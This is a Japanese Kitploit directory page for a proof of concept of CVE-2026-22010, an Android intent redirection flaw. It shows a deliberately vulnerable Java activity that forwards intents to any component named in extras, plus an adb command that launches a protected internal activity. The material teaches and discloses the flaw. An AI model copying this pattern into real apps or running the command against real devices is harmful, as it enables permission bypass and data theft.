Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — CVE-2026-22010 Androidインテントリダイレクションの概念実証: エクスポートされたアクティビティがインテントを攻撃者制御の内部コンポーネントへ転送し、権限チェックをバイパスすることを実証します。脆弱なJavaコードとadb悪用手順が含まれます。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Androidセキュリティ脆弱性分析エクスプロイトモバイルアプリペンテストモバイルセキュリティ学習と教育
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

CVE-2026-22010 Androidインテントリダイレクションの概念実証: エクスポートされたアクティビティがインテントを攻撃者制御の内部コンポーネントへ転送し、権限チェックをバイパスすることを実証します。脆弱なJavaコードとadb悪用手順が含まれます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
116日前未レビュー

CVE-2026-22010 – エクスポートされたコンポーネントへのAndroidインテントリダイレクト

プログラムコード(Java/Android シミュレーション)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – エクスポートされたコンポーネントへのAndroidインテントリダイレクト

Severity: High

概要

エクスポートされたAndroidアクティビティが、受信したインテントをインテントのextrasで指定されたコンポーネントへ無条件にリダイレクトします。攻撃者は、アプリが保護された内部アクティビティを攻撃者制御のデータで起動するように仕向けるインテントを作成でき、権限チェックをバイパスできます。

脆弱性の詳細

  • 種別: インテントリダイレクト / 権限バイパス
  • 影響: 非公開コンポーネントへのアクセス、データ窃取。
  • 根本原因: アプリがインテントを転送する前に、対象コンポーネント(パッケージ名とクラス名)を検証していません。

悪用の実証

脆弱なアプリをAndroidエミュレータにデプロイします。adbを使用してインテントを送信します:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

内部アクティビティが適切な権限なしに起動します。

ツールをダウンロード